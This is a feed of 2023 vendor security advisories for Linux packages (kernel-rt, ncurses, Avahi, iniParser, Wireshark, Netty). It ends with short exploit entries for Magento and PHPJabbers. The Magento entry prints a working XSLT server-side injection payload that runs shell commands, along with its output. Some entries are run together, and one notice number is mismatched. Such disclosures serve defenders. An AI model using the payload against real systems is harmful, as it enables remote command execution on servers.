Red Hat Security Advisory 2023-7379-01 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7379.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2023:7379-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7379  
Issue date:         2023-11-21  
Revision:           01  
CVE Names:          CVE-2022-27672  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: tun: bugs for oversize packet when napi frags enabled in tun_napi_alloc_frags (CVE-2023-3812)

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208)

* kernel: use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)

* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)

* kernel: AMD: Cross-Thread Return Address Predictions (CVE-2022-27672)

* hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-27672

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/7027704  
https://bugzilla.redhat.com/show_bug.cgi?id=2174765  
https://bugzilla.redhat.com/show_bug.cgi?id=2223949  
https://bugzilla.redhat.com/show_bug.cgi?id=2224048  
https://bugzilla.redhat.com/show_bug.cgi?id=2225201  
https://bugzilla.redhat.com/show_bug.cgi?id=2225511  
https://bugzilla.redhat.com/show_bug.cgi?id=2239843  
https://bugzilla.redhat.com/show_bug.cgi?id=2241924

Red Hat Security Advisory 2023-7379-01

Red Hat Security Advisory 2023-7361-01 - An update for ncurses is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7361.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ncurses security updateAdvisory ID:        RHSA-2023:7361-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7361Issue date:         2023-11-21Revision:           01CVE Names:          CVE-2023-29491====================================================================Summary: An update for ncurses is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The ncurses (new curses) library routines are a terminal-independent method of updating character screens with reasonable optimization. The ncurses packages contain support utilities including a terminfo compiler tic, a decompiler infocmp, clear, tput, tset, and a termcap conversion tool captoinfo.Security Fix(es):* ncurses: Local users can trigger security-relevant memory corruption via malformed data (CVE-2023-29491)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-29491References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2191704

Red Hat Security Advisory 2023-7361-01

Ubuntu Security Notice 6497-1 - Evgeny Vereshchagin discovered that Avahi contained several reachable assertions, which could lead to intentional assertion failures when specially crafted user input was given. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6487-1  
November 20, 2023

avahi vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Avahi could be made to crash if it received specially crafted  
input.

Software Description:  
- avahi: IPv4LL network address configuration daemon

Details:

Evgeny Vereshchagin discovered that Avahi contained several reachable  
assertions, which could lead to intentional assertion failures when  
specially crafted user input was given. An attacker could possibly use  
this issue to cause a denial of service. (CVE-2023-38469, CVE-2023-38470,  
CVE-2023-38471, CVE-2023-38472, CVE-2023-38473)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   avahi-daemon                    0.8-10ubuntu1.1  
   libavahi-client3                0.8-10ubuntu1.1  
   libavahi-common3                0.8-10ubuntu1.1  
   libavahi-core7                  0.8-10ubuntu1.1

Ubuntu 23.04:  
   avahi-daemon                    0.8-6ubuntu1.23.04.2  
   libavahi-client3                0.8-6ubuntu1.23.04.2  
   libavahi-common3                0.8-6ubuntu1.23.04.2  
   libavahi-core7                  0.8-6ubuntu1.23.04.2

Ubuntu 22.04 LTS:  
   avahi-daemon                    0.8-5ubuntu5.2  
   libavahi-client3                0.8-5ubuntu5.2  
   libavahi-common3                0.8-5ubuntu5.2  
   libavahi-core7                  0.8-5ubuntu5.2

Ubuntu 20.04 LTS:  
   avahi-daemon                    0.7-4ubuntu7.3  
   libavahi-client3                0.7-4ubuntu7.3  
   libavahi-common3                0.7-4ubuntu7.3  
   libavahi-core7                  0.7-4ubuntu7.3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   avahi-daemon                    0.7-3.1ubuntu1.3+esm2  
   libavahi-client3                0.7-3.1ubuntu1.3+esm2  
   libavahi-common3                0.7-3.1ubuntu1.3+esm2  
   libavahi-core7                  0.7-3.1ubuntu1.3+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   avahi-daemon                    0.6.32~rc+dfsg-1ubuntu2.3+esm3  
   libavahi-client3                0.6.32~rc+dfsg-1ubuntu2.3+esm3  
   libavahi-common3                0.6.32~rc+dfsg-1ubuntu2.3+esm3  
   libavahi-core7                  0.6.32~rc+dfsg-1ubuntu2.3+esm3

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   avahi-daemon                    0.6.31-4ubuntu1.3+esm3  
   libavahi-client3                0.6.31-4ubuntu1.3+esm3  
   libavahi-common3                0.6.31-4ubuntu1.3+esm3  
   libavahi-core7                  0.6.31-4ubuntu1.3+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6487-1  
   CVE-2023-38469, CVE-2023-38470, CVE-2023-38471, CVE-2023-38472,  
   CVE-2023-38473

Package Information:  
   https://launchpad.net/ubuntu/+source/avahi/0.8-10ubuntu1.1  
   https://launchpad.net/ubuntu/+source/avahi/0.8-6ubuntu1.23.04.2  
   https://launchpad.net/ubuntu/+source/avahi/0.8-5ubuntu5.2  
   https://launchpad.net/ubuntu/+source/avahi/0.7-4ubuntu7.3

Ubuntu Security Notice USN-6497-1

Ubuntu Security Notice 6487-1 - Evgeny Vereshchagin discovered that Avahi contained several reachable assertions, which could lead to intentional assertion failures when specially crafted user input was given. An attacker could possibly use this issue to cause a denial of service.

Ubuntu Security Notice USN-6487-1

Ubuntu Security Notice 6486-1 - It was discovered that iniParser incorrectly handled certain files. An attacker could possibly use this issue to cause a crash.

==========================================================================  
Ubuntu Security Notice USN-6486-1  
November 20, 2023

iniparser vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Iniparser could be made to crash if it received a specially crafted file.

Software Description:  
- iniparser: development files for the iniParser INI file reader/writer

Details:

It was discovered that iniParser incorrectly handled certain files.  
An attacker could possibly use this issue to cause a crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  libiniparser1                   4.1-6ubuntu0.23.10.1

Ubuntu 23.04:  
  libiniparser1                   4.1-6ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
  libiniparser1                   4.1-4ubuntu4.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6486-1  
  CVE-2023-33461

Package Information:  
  https://launchpad.net/ubuntu/+source/iniparser/4.1-6ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/iniparser/4.1-6ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/iniparser/4.1-4ubuntu4.1

Ubuntu Security Notice USN-6486-1

Debian Linux Security Advisory 5559-1 - A vulnerability was discovered in the SSH dissector of Wireshark, a network protocol analyzer, which could result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5559-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 19, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wiresharkCVE ID         : CVE-2023-6174 CVE-2023-6175A vulnerability was discovered in the SSH dissector of Wireshark, anetwork protocol analyzer, which could result in denial of service orpotentially the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 4.0.11-1~deb12u1.We recommend that you upgrade your wireshark packages.For the detailed security status of wireshark please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wiresharkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVaYm8ACgkQEMKTtsN8Tjbp5A//TSNrnxYrdW4XklOocknIwdtDtzt3AcXA6MLRlWmXnR9I3JWAnfWG84ezlXM/p3kLRN2bzfYVqhL2MpCNQzDyrTpx+0GWSImkPy520WlIrC64GHOqffIffDeF+28bQfdhbI13Kcfc9F7/PLIA9VvzqoFPHlCVdJhxvaCCJHBN2HefNC4fnEKlpU+ZI/68nzvzZsJG5K3tcdUp9BDYr8eRqmfWwuIteTBqfZ13ohvU8lYK6TNZah+NiGoSUmLGtf/5QMXeytiIVDkul5+b206ckvotm2EZQXtZntjZijPbLI1Fh8rPAuVDEbmBQOwYYc7OKlNDKl3GM2bnMXbJaNDBJ2YJk2hO5OfTankrnY54LX7R3D0WBhsDRb7X4tx9shgWOm23aigUj0ebR5jVmaDMYAOMEr5U9juPa8LBRu9gQWRbuuwADTcjsGQiYhjqKoGrCErSInuQUyNSgmyBQgeA4uQipSLpQozt42u2CfBJb5te+sI/USF9xK6xusF5BZK+5leinGLQyDd/wMn8gx/UzbDcvjuT3XMek+1fJjVfzLehorwt+Ck4yXc9edKRFS86ZRVSchFVmZUFREGszNQAwWUbtlXfeLBIF8yNqp7E9qTMyjBpCplk/Vnb3va6wJhMCYTUAgBYVjQ2P6tCPyQJHB8HrXgexcBluGBuu1q2b4M==sLQ/-----END PGP SIGNATURE-----

Debian Security Advisory 5559-1

Debian Linux Security Advisory 5558-1 - Two security vulnerabilities have been discovered in Netty, a Java NIO client/server socket framework.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5558-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 18, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : netty  
CVE ID         : CVE-2023-34462 CVE-2023-44487  
Debian Bug     : 1038947 1054234

Two security vulnerabilities have been discovered in Netty, a Java NIO  
client/server socket framework.

CVE-2023-34462

    It might be possible for a remote peer to send a client hello packet during  
    a TLS handshake which lead the server to buffer up to 16 MB of data per  
    connection. This could lead to a OutOfMemoryError and so result in a denial  
    of service.

CVE-2023-44487

    The HTTP/2 protocol allowed a denial of service (server resource  
    consumption) because request cancellation can reset many streams quickly.  
    This problem is also known as Rapid Reset Attack.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:4.1.48-4+deb11u2.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:4.1.48-7+deb12u1.

We recommend that you upgrade your netty packages.

For the detailed security status of netty please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/netty

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmVY5TZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRHiBAAzFhW85Ho37J02wrSDVwhIMTsVjNO9lnA08Pswdohr9K1wxeCJ/hBAx97  
UNIrjTxyOfCJWi1Kj5pITXEHBRu6w1fj/5y9yoMpAKEu+oGQroHbSf4CPmqP2Of0  
eamkfbGx2Dh7Ug3qYxe+elcqRtU3gu8I8DYcWJnm2VpWq7/pbNJ+9iqtmMjhkPLH  
1etLI/5HAkwpPimZSrHzcimn39gEVaIbZLc86ZBAoAPghc+iJR1JFHERmkEutWkB  
eAnL3kD1mr6F711eZvDfPaRfEUVorW67ZEpPX68MJExuYHNXd268EhQOhf/ZYv8g  
SUSBJuKw4w2OnL4fn8lhqnQgYHUVkcYBtfYii6E9bEVAIPoaT+4gvdSg9zkF6cza  
Da8SXkEY2ysaX+A24iVnCNMpCMSOUOxWsFFvkCcfi8A4HxGGqWzVOsBbDJKjktS1  
g6FyeqWsGh9QG/CPYeMN7LB7lW1l2XzO6GQ9QR1rzU/whgUVxprkye5wx2BaQmom  
rrWVHBijH1cNWd1IbryAm+prduL1l/CNR0785ZPTjB3SsMFPCAtRHf9G976rqVs0  
P3jGg+BdeDj+sd3EFHcHnNXQOaETgR07RWzngbjEkgmJYhB2B43hCQ2LwsNlHsmg  
O6otUI2k274IF9KHh0T1h1hopbUTU8VPy3dpcLloCzk7KiAv1RI=  
=4ExT  
-----END PGP SIGNATURE-----

Debian Security Advisory 5558-1

Magento version 2.4.6 XSLT server-side injection proof of concept exploit.

    # Exploit Title: Magento ver. 2.4.6 - XSLT Server Side InjectionDate:** 2023-11-17Exploit Author:** tmrswrrVendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)Version:** 2.4.6Tested on:** 2.4.6## POC1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`3. Choose Import Source is File4. Click `XSLT Configuration` and write this payload:   ```xml   <?xml version="1.0" encoding="utf-8"?>   <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"   xmlns:php="http://php.net/xsl">     <xsl:template match="/">       <xsl:value-of select="php:function('shell_exec','id')" />     </xsl:template>   </xsl:stylesheet>```##RESULT  **<?xml version="1.0"?>**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Magento 2.4.6 XSLT Server Side Injection

PHPJabbers Availability Booking Calendar version 5.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSVInjection# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48207Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to CSVinjection vulnerability which allows an attacker to execute remote code.The vulnerability exists due to insufficient input validation on the UniqueID field in the Reservations list that is used to construct a CSV file.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click Language and go to Labels.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48207)